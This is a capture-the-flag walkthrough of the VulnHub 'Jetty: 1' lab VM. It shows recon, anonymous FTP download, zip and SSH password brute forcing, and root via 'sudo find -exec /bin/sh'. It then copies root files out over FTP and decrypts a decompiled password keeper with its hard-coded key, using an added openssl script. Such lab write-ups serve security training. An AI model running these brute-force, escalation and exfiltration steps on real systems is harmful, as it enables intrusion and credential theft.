Vulnhub Jetty 1

Vulnhub Jetty: 1

Lab setup

Download: https://www.vulnhub.com/entry/jetty-1,621/

Penetration test

Information gathering

Discover the target IP

arp-scan -l

Port scan

nmap -p- -sV -sC -A 192.168.131.134

21 FTP

80 HTTP

65507 SSH

FTP allows anonymous login.

Visit port 80

Directory scan

gobuster dir -u http://192.168.131.134 -w /usr/share/wordlists/dirb/big.txt -x php

robots.txt is found.

Open it.

With the usual three steps done, on to exploitation.

Exploitation

Earlier we found that FTP allows anonymous login.

Log in anonymously and take a look.

ls produces no output...

Logging in works, but that is all.

Search online.

wget -r ftp://192.168.131.134

In any case we know there is something in there.

Since it cannot be listed, just download everything.

Inspect the files

cat README.txt

The note says the zip file is encrypted, the password is the company default password, and the FTP service should be shut down after reading it.

Cracking the archive password

The archive password is unknown and no related information was found, so brute force is the only option.

fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt sshpass.zip

Extract the archive

unzip sshpass.zip
cat sshpass.txt

It records the SSH password: Squ1d4r3Th3B3$t0fTh3W0rLd

Port 65507 found earlier is SSH,

but the username is unknown.

Username brute force

hydra -L /usr/share/wordlists/dirb/others/names.txt -p Squ1d4r3Th3B3$t0fTh3W0rLd ssh://192.168.131.134:65507

The brute force finds nothing; the target may also not cope well with being brute-forced.

Search online.

It turns out the VulnHub description of the machine already contained a hint:

  • Extra information: The suspicious username is Squiddie. He was in charge of the ticket selling for the Aquarium. Ethernet settings set to NAT with DHCP enabled. You should find the IP in your VLAN.

So the account is Squiddie.

ssh squiddie@192.168.131.134 -p 65507

Privilege escalation

Use python3 to switch to a pty

python3 -c "import pty;pty.spawn('/bin/bash')"

The host has both python2 and python3; the pty is spawned from the python2 interactive shell.

python
>>> import pty
>>> pty.spawn('/bin/bash')

sudo privilege escalation

Check whether the current user has sudo rights

sudo -l

The find command can be run with sudo without a password.

Escalate privileges with find

sudo find . -exec /bin/sh \; -quit

Privilege escalation succeeded.

Switch to a pty

python3 -c "import pty;pty.spawn('/bin/bash')"

Use find to locate root.txt

find / -name root.txt

Go into /root and two files are found.

cat note.txt
cat proof.txt

Obtaining the evidence

Information gathering

The goal is not only to escalate to root but also to obtain the evidence, so check the scheduled tasks.

crontab -l

This means the script /etc/cron.daily/backup runs every 2 minutes.

Got stuck here...

cat /etc/cron.daily/backup

It uses rsync to synchronise files,

backing up from /root/Documents/.docs to /var/backups/.docs.

cd /root/Documents/.docs
cd /var/backups/.docs

Copy the files in that directory to /home/ftp.

cp -r /root/Documents/.docs/. /home/ftp/docs/

Download the docs directory with wget; packing it first and then downloading would have been better.

wget -nH -m --ftp-user=ftp ftp://192.168.131.134/docs/

A password is needed to open it.

Look at the files in the password_keeper directory.

## database.txt
instagram T9Y0Ku/oDv80H8CUzBKkwQ==
facebook IXKnuKh73jCOKcEZAaHnIQ==
Accountabilty_not_cooked rbRH72cf3UiHXcmQB6o0OA==
MoneyBalance rRd3m80KzzTik3Eu9BRWy95GsORKwD+adfTUfPLaxVk=
Pending_to_erase aneylFYmV/jz/7g5j+Ck15oreK1VhmaKmTwa8cdSnpY=

## usage.txt
Usage:
  *Linux: wine password_keeper.exe (database.txt must be in the same folder as the password_keeper.exe)
  *Windows: password_keeper.exe (database.txt must be in the same folder as the password_keeper.exe)
This program was compiled using pyinstaller.

To get the spreadsheet password we only need the password the small program asks for, so decompile the program and analyse the code.

The program was built with pyinstaller, so tools can recover its source.

Python decompilation

password_keeper.exe

Since the file is provided, it can simply be run on Windows.

Extract the embedded files with pyinstxtractor; password_keeper.pyc is recovered.

Tool:

https://github.com/extremecoders-re/pyinstxtractor

Decompile with uncompyle6, which warns that it must run under Python 2.6-3.8.

pip install uncompyle6
uncompyle6 password_keeper.pyc > ../pass.py

Decompiled source:

# uncompyle6 version 3.9.1
# Python bytecode version base 2.7 (62211)
# Decompiled from: Python 3.9.8 (main, Nov  7 2021, 15:47:09)
# [GCC 11.2.0]
# Embedded file name: password_keeper.py

from Cryptodome.Cipher import AES
import base64
BS = 16
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s: s[0:-ord(s[-1])]

def cipher_message(key, message, iv):
    message = pad(message)
    key = base64.b64decode(key)
    obj = AES.new(key, AES.MODE_CBC, iv)
    ciphertext = obj.encrypt(message)
    ciphertext = base64.b64encode(ciphertext)
    return ciphertext


def decipher_message(key, ciphertext, iv):
    ciphertext = base64.b64decode(ciphertext)
    key = base64.b64decode(key)
    obj2 = AES.new(key, AES.MODE_CBC, iv)
    decipher_text = obj2.decrypt(ciphertext)
    decipher_text = unpad(decipher_text)
    return decipher_text


def generate_key(ciphertext, tag, key, iv):
    ciphertext = cipher_message(key, ciphertext, iv)
    print ''
    print "Now copy this into your database.txt (It's the free version... pay for an automated tool!)"
    print ''
    print 'Tag Password'
    print tag + ' ' + ciphertext


def show_keys(database, key, iv):
    check_permissions = raw_input('Insert password: ')
    if base64.b64encode(check_permissions) == key:
        for i in range(len(database[0])):
            ciphertext = database[1][i]
            decipher = decipher_message(key, ciphertext, iv)
            print ' '
            print 'Tag: ' + database[0][i] + ' Password: ' + decipher
            print ' '

    else:
        print ''
        print 'Tag: Instagram Password: WRONG '
        print 'Tag: Facebook  Password: PASSWORD '
        print 'Tag: SSH       Password: TRY '
        print 'Tag: root      Password: HARDER! '
        print ''


def read_database():
    database = [[], []]
    f = open('database.txt', 'r')
    for line in f.readlines():
        line = line.strip().split()
        database[0].append(line[0])
        database[1].append(line[1])

    f.close()
    return database


def main():
    print 'Welcome to the best password keeper ever!'
    print '__        __         _                _  __                         '
    print '\\ \\      / /__  __ _| | ___   _      | |/ /___  ___ _ __   ___ _ __ '
    print " \\ \\ /\\ / / _ \\/ _` | |/ / | | |_____| ' // _ \\/ _ \\ '_ \\ / _ \\ '__|"
    print '  \\ V  V /  __/ (_| |   <| |_| |_____| . \\  __/  __/ |_) |  __/ |   '
    print '   \\_/\\_/ \\___|\\__,_|_|\\_\\__,  |     |_|\\_\\___|\\___| .__/ \\___|_|   '
    print '                          |___/                    |_|   '
    iv = '166fe2294df5d0f3'
    key = 'N2FlMjE4ZmYyOTI4ZjZiMg=='
    database = read_database()
    loop = True
    while loop:
        print ''
        print 'Choose what you want to do: '
        print '1) See your passwords!'
        print '2) Generate a cipher-password'
        print '3) Close'
        option = raw_input('Insert your selection here --> ')
        if option == '1':
            print ''
            print 'Showing content of your secret passwords...'
            print ''
            show_keys(database, key, iv)
            print ''
            returned = raw_input('Press any button to return to the menu...')
        elif option == '2':
            print ''
            print ''
            title = raw_input('Type the name of the application: ')
            password = raw_input('Type the password(BEWARE OF SHOULDER SURFING!!!): ')
            generate_key(password, title, key, iv)
            print ''
            print ''
            returned = raw_input('Press any button to return to the menu...')
        elif option == '3':
            loop = False
            print ''
            return 'Bye Byeeeeeeeeeeeee'
        print ''
        print ''
        print 'WHAT? FAILURE TO COMMUNICATE... Reseting connection...'
        print ''
        print ''
        returned = raw_input('Press any button to return to the menu...')


if __name__ == '__main__':
    print main()

#okay decompiling password_keeper.pyc

Entering 1 calls show_keys(), which base64-encodes the input and compares it with the hard-coded key, so the "master password" is recoverable from the binary itself. Mirroring that check, base64-decoding key gives the password 7ae218ff2928f6b2.

echo "N2FlMjE4ZmYyOTI4ZjZiMg==" | base64 -d

With it the program reveals the stored passwords, which open the document and provide the criminal evidence.

Tag: instagram Password: S3x1B0y
Tag: facebook Password: M4rK1sS0s3X1
Tag: Accountabilty_not_cooked Password: co8oiads13kt
Tag: MoneyBalance Password: C5Y0wzGqq4Xw8XGD
Tag: Pending_to_erase Password: 1hi2ChHrtkQsUTOc
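As an added example that is not part of the original write-up, the script below reproduces the program's logic from the shell: it recovers the master password from the embedded key constant exactly as the base64 -d step does, then decrypts the database.txt entries with the openssl CLI using the same key and IV constants (AES-128-CBC with PKCS#7 padding, which is what the program's pad()/unpad() implement). It assumes openssl, base64 and od are available; the key, IV and database lines are the ones quoted from the decompiled source and the FTP download.

```shell
# Added example, not from the original post: redo show_keys()/decipher_message()
# with nothing but the two constants from the decompiled password_keeper.py.
KEY_B64='N2FlMjE4ZmYyOTI4ZjZiMg=='   # 'key' constant in main()
IV='166fe2294df5d0f3'                # 'iv' constant in main()

# show_keys() accepts a password iff base64(password) == key, so the master
# password is just the decoded key; the same 16 ASCII bytes are the AES key.
recover_master_password() {
    printf '%s' "$KEY_B64" | base64 -d
}

# openssl takes -K/-iv as hex; the program hands the ASCII strings to AES as-is.
to_hex() {
    printf '%s' "$1" | od -An -tx1 | tr -d ' \n'
}

# decipher_message(): base64 -> AES-128-CBC -> strip PKCS#7 padding.
decrypt_entry() {
    printf '%s' "$1" | openssl enc -d -aes-128-cbc -a -A \
        -K "$(to_hex "$(recover_master_password)")" -iv "$(to_hex "$IV")"
}

# cipher_message(), kept so a round trip can be checked.
encrypt_entry() {
    printf '%s' "$1" | openssl enc -aes-128-cbc -a -A \
        -K "$(to_hex "$(recover_master_password)")" -iv "$(to_hex "$IV")"
}

# database.txt as listed above: one "tag ciphertext" pair per line.
sample_database() {
    cat <<'EOF'
instagram T9Y0Ku/oDv80H8CUzBKkwQ==
facebook IXKnuKh73jCOKcEZAaHnIQ==
Accountabilty_not_cooked rbRH72cf3UiHXcmQB6o0OA==
MoneyBalance rRd3m80KzzTik3Eu9BRWy95GsORKwD+adfTUfPLaxVk=
Pending_to_erase aneylFYmV/jz/7g5j+Ck15oreK1VhmaKmTwa8cdSnpY=
EOF
}

# read_database() + the show_keys() output format, reading stdin.
dump_database() {
    while read -r tag ct; do
        [ -n "$tag" ] || continue
        printf 'Tag: %s Password: %s\n' "$tag" "$(decrypt_entry "$ct")"
    done
}

# sh recover.sh [database.txt]; without a file the sample above is used.
if [ -n "${1:-}" ] && [ -f "$1" ]; then dump_database < "$1"; else sample_database | dump_database; fi
```

The same constants decrypt every entry, which is the core weakness: a static key and IV inside the shipped binary make the "Insert password" prompt purely cosmetic.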
